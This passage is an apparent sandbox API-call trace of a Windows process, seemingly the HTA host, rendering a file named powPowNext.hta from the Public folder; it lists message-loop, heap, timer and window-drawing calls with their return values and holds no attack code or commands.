nDenominator=1) returned 0 [0162.371] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.372] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.372] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.372] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x690658 [0162.373] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.373] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.373] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.373] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.373] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.373] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.373] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.374] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6901f0 [0162.374] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.374] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.375] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.375] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.376] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x690208 [0162.377] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690658 | out: hHeap=0x5e0000) returned 1 [0162.377] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6901f0 | out: hHeap=0x5e0000) returned 1 [0162.377] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690208 | out: hHeap=0x5e0000) returned 1 [0162.377] LsSetDoc () returned 0x0 [0162.377] LsCreateLine () returned 0x0 [0162.377] LsDisplayLine () returned 0x0 [0162.380] LsDestroyLine () returned 0x0 [0162.381] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0162.457] BitBlt (hdc=0x4010197, x=0, y=0, cx=442, cy=256, hdcSrc=0x8e01071c, x1=0, y1=0, rop=0xcc0020) returned 1 [0162.457] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0162.459] ReleaseDC (hWnd=0x103e2, hDC=0xb010541) returned 1 [0162.459] QueryPerformanceCounter (in: lpPerformanceCount=0x199dd8 | out: lpPerformanceCount=0x199dd8*=3098127845918) returned 1 [0162.460] DeleteObject (ho=0x8a040a6c) returned 1 [0162.461] GetCurrentThreadId () returned 0xb48 [0162.461] GetCurrentThreadId () returned 0xb48 [0162.461] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0162.461] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2f0 | out: lpPerformanceCount=0x19a2f0*=3098128034069) returned 1 [0162.461] QueryPerformanceCounter (in: lpPerformanceCount=0x19a300 | out: lpPerformanceCount=0x19a300*=3098128039632) returned 1 [0162.461] KillTimer (hWnd=0x30316, uIDEvent=0x2004) returned 1 [0162.462] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3098128092535) returned 1 [0162.462] QueryPerformanceCounter (in: lpPerformanceCount=0x19a210 | out: lpPerformanceCount=0x19a210*=3098128121442) returned 1 [0162.463] SetEvent (hEvent=0x304) returned 1 [0162.463] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.465] QueryPerformanceCounter (in: lpPerformanceCount=0x19a304 | out: lpPerformanceCount=0x19a304*=3098128411788) returned 1 [0162.465] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2e0 | out: lpPerformanceCount=0x19a2e0*=3098128427294) returned 1 [0162.465] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2f0 | out: lpPerformanceCount=0x19a2f0*=3098128432142) returned 1 [0162.466] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.466] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0162.473] NtdllDefWindowProc_W () returned 0x0 [0162.473] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0162.473] NtdllDefWindowProc_W () returned 0x0 [0162.474] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0162.475] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.475] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.475] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0162.475] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.475] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.475] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.475] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.475] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.475] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.475] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.475] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.476] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.476] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0162.476] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0162.479] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098129827918) returned 1 [0162.480] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0162.480] NtdllDefWindowProc_W () returned 0x0 [0162.480] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.480] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.480] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.480] KillTimer (hWnd=0x30316, uIDEvent=0x2007) returned 1 [0162.480] PostMessageW (hWnd=0x30316, Msg=0x113, wParam=0x2000, lParam=0x0) returned 1 [0162.481] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3098129966083) returned 1 [0162.481] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098129986998) returned 1 [0162.481] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098129995778) returned 1 [0162.481] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098130001198) returned 1 [0162.481] SetEvent (hEvent=0x668) returned 1 [0162.482] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.482] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.482] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.482] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.482] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.482] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.482] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0162.482] NtdllDefWindowProc_W () returned 0x0 [0162.482] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.482] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.482] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.482] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0162.483] KillTimer (hWnd=0x103ba, uIDEvent=0x1000) returned 1 [0162.483] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0162.483] IUri:GetScheme (in: This=0x609dbc, pdwScheme=0x199828 | out: pdwScheme=0x199828*=0x9) returned 0x0 [0162.483] IUnknown:QueryInterface (in: This=0x609dbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1997d4 | out: ppvObject=0x1997d4*=0x609dbc) returned 0x0 [0162.483] IUnknown:Release (This=0x609dbc) returned 0x8 [0162.483] IUnknown:AddRef (This=0x609dbc) returned 0x9 [0162.483] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/Public/powPowNext.hta", pszPath=0x19a040, pcchPath=0x199810, dwFlags=0x0 | out: pszPath="C:\\Users\\Public\\powPowNext.hta", pcchPath=0x199810) returned 0x0 [0162.484] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x42) returned 0x6928b0 [0162.484] IUnknown:Release (This=0x609dbc) returned 0x8 [0162.484] GetWindowTextW (in: hWnd=0x70258, lpString=0x1993b4, nMaxCount=512 | out: lpString="") returned 0 [0162.484] NtdllDefWindowProc_W () returned 0x0 [0162.484] SetWindowTextW (hWnd=0x70258, lpString="C:\\Users\\Public\\powPowNext.hta") returned 1 [0162.484] NtdllDefWindowProc_W () returned 0x1 [0162.485] IUnknown:Release (This=0x609dbc) returned 0x7 [0162.485] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928b0 | out: hHeap=0x5e0000) returned 1 [0162.485] GetCurrentThreadId () returned 0xb48 [0162.485] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.485] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.485] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.485] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0162.485] SetTimer (hWnd=0x103ba, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0162.485] GetCurrentThreadId () returned 0xb48 [0162.485] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.485] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.485] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.485] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0162.485] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0162.485] GetCurrentThreadId () returned 0xb48 [0162.486] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.486] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.486] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.486] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0162.486] SetTimer (hWnd=0x103e2, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0162.486] GetCurrentThreadId () returned 0xb48 [0162.486] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.486] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.486] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.486] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.583] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.583] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.583] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0162.583] KillTimer (hWnd=0x103ba, uIDEvent=0x1008) returned 1 [0162.584] GetCurrentThreadId () returned 0xb48 [0162.584] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.584] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.584] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.584] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0162.584] KillTimer (hWnd=0x103e2, uIDEvent=0x1008) returned 1 [0162.584] IsWinEventHookInstalled (event=0x8004) returned 1 [0162.584] NotifyWinEvent (event=0x8004, hwnd=0x103e2, idObject=-4, idChild=0) [0162.584] GetCurrentThreadId () returned 0xb48 [0162.584] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0162.786] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0162.786] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0162.787] KillTimer (hWnd=0x30316, uIDEvent=0x2008) returned 1 [0162.787] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0163.740] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0163.740] NtdllDefWindowProc_W () returned 0x0 [0163.741] NtdllDefWindowProc_W () returned 0x0 [0163.741] NtdllDefWindowProc_W () returned 0x0 [0163.742] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0163.743] IsIconic (hWnd=0x103e0) returned 0 [0163.743] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0163.743] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0163.743] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0163.743] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0163.743] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0163.743] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0163.743] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0163.743] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0xc040a78 [0163.743] GetUpdateRgn (hWnd=0x103e2, hRgn=0xc040a78, bErase=0) returned 1 [0163.744] DeleteObject (ho=0xc040a78) returned 1 [0163.744] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0163.744] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0163.744] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0163.744] NtdllDefWindowProc_W () returned 0x0 [0163.744] GetCurrentThreadId () returned 0xb48 [0163.744] GetCurrentThreadId () returned 0xb48 [0163.745] GetWindowRect (in: hWnd=0x103e0, lpRect=0x19a324 | out: lpRect=0x19a324) returned 1 [0163.747] NtdllDefWindowProc_W () returned 0x0 [0163.749] NtdllDefWindowProc_W () returned 0x0 [0163.750] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0163.750] NtdllDefWindowProc_W () returned 0x0 [0163.750] NtdllDefWindowProc_W () returned 0x0 [0163.750] NtdllDefWindowProc_W () returned 0x0 [0163.750] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0163.751] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0163.751] NtdllDefWindowProc_W () returned 0x0 [0163.751] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0163.751] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0163.751] NtdllDefWindowProc_W () returned 0x1 [0163.755] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0163.756] GetFocus () returned 0x0 [0163.756] SetFocus (hWnd=0x103e2) returned 0x0 [0163.756] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0163.756] GetMessagePos () returned 0x11e01d6 [0163.757] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x199a74 | out: plResult=0x199a74) returned 0x0 [0163.771] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0163.772] GetMessagePos () returned 0x11e01d6 [0163.772] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.772] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.772] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.772] memcpy_s (in: _Destination=0xd6fb00, _DestinationSize=0x118, _Source=0xd6f9e0, _SourceSize=0x118 | out: _Destination=0xd6fb00) returned 0x0 [0163.772] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcea0 [0163.772] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.773] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0163.773] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0163.774] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcea0 | out: hHeap=0x5e0000) returned 1 [0163.774] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.781] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.781] memcpy_s (in: _Destination=0xd6fc20, _DestinationSize=0x118, _Source=0xd6f9e0, _SourceSize=0x118 | out: _Destination=0xd6fc20) returned 0x0 [0163.781] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dce40 [0163.781] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.781] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0163.781] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0163.781] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0163.781] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0163.781] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0163.782] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0163.783] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0163.783] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0163.783] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0163.783] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0163.783] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.783] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dce40 | out: hHeap=0x5e0000) returned 1 [0163.783] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x199334 | out: plResult=0x199334) returned 0x0 [0163.784] GetCurrentThreadId () returned 0xb48 [0163.784] GetCurrentThreadId () returned 0xb48 [0163.784] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0163.784] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0163.784] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x199e44 | out: phIMC=0x199e44*=0x0) returned 0x0 [0163.785] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0163.785] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0163.785] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.786] GetCurrentThreadId () returned 0xb48 [0163.786] GetCurrentThreadId () returned 0xb48 [0163.786] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.786] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.787] GetCurrentThreadId () returned 0xb48 [0163.787] GetCurrentThreadId () returned 0xb48 [0163.788] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.788] GetCurrentThreadId () returned 0xb48 [0163.788] GetCurrentThreadId () returned 0xb48 [0163.788] GetCurrentThreadId () returned 0xb48 [0163.789] GetMessagePos () returned 0x11e01d6 [0163.789] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x199da4 | out: plResult=0x199da4) returned 0x1 [0163.789] NtdllDefWindowProc_W () returned 0x0 [0163.789] GetCurrentThreadId () returned 0xb48 [0163.791] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0163.791] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0163.792] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0163.792] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.793] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0163.793] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.793] GetCurrentThreadId () returned 0xb48 [0163.793] GetCurrentThreadId () returned 0xb48 [0163.794] IsWinEventHookInstalled (event=0x8005) returned 0 [0163.794] GetCurrentThreadId () returned 0xb48 [0163.794] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0163.794] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.795] GetCurrentThreadId () returned 0xb48 [0163.795] GetCurrentThreadId () returned 0xb48 [0163.795] GetFocus () returned 0x103e2 [0163.795] GetCurrentThreadId () returned 0xb48 [0163.795] IsWinEventHookInstalled (event=0x8005) returned 0 [0163.795] GetCurrentThreadId () returned 0xb48 [0163.795] GetCurrentThreadId () returned 0xb48 [0163.796] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0163.796] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.796] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0163.797] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.797] GetCurrentThreadId () returned 0xb48 [0163.797] GetCurrentThreadId () returned 0xb48 [0163.797] IsWinEventHookInstalled (event=0x800a) returned 0 [0163.797] GetCurrentThreadId () returned 0xb48 [0163.798] LsSetDoc () returned 0x0 [0163.798] LsCreateLine () returned 0x0 [0163.799] LsDestroyLine () returned 0x0 [0163.799] GetFocus () returned 0x103e2 [0163.799] SystemParametersInfoW (in: uiAction=0x2006, uiParam=0x0, pvParam=0x19a268, fWinIni=0x0 | out: pvParam=0x19a268) returned 1 [0163.799] _CIsqrt () returned 0x3ff0027f [0163.799] _CIsqrt () returned 0x3ff0027f [0163.799] _CIatan2 () returned 0x20 [0163.800] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098261880254) returned 1 [0163.800] GetCurrentThreadId () returned 0xb48 [0163.800] GetCurrentThreadId () returned 0xb48 [0163.800] GetCurrentThreadId () returned 0xb48 [0163.800] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3098261953253) returned 1 [0163.801] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3098261970588) returned 1 [0163.801] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3098261982369) returned 1 [0163.801] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3098261988602) returned 1 [0163.801] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3098261995288) returned 1 [0163.801] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3098262021003) returned 1 [0163.801] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3098262029798) returned 1 [0163.801] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.801] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.802] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.802] SetEvent (hEvent=0x304) returned 1 [0163.802] WTSGetActiveConsoleSessionId () returned 0x1 [0163.802] GetCurrentProcessId () returned 0xe14 [0163.802] 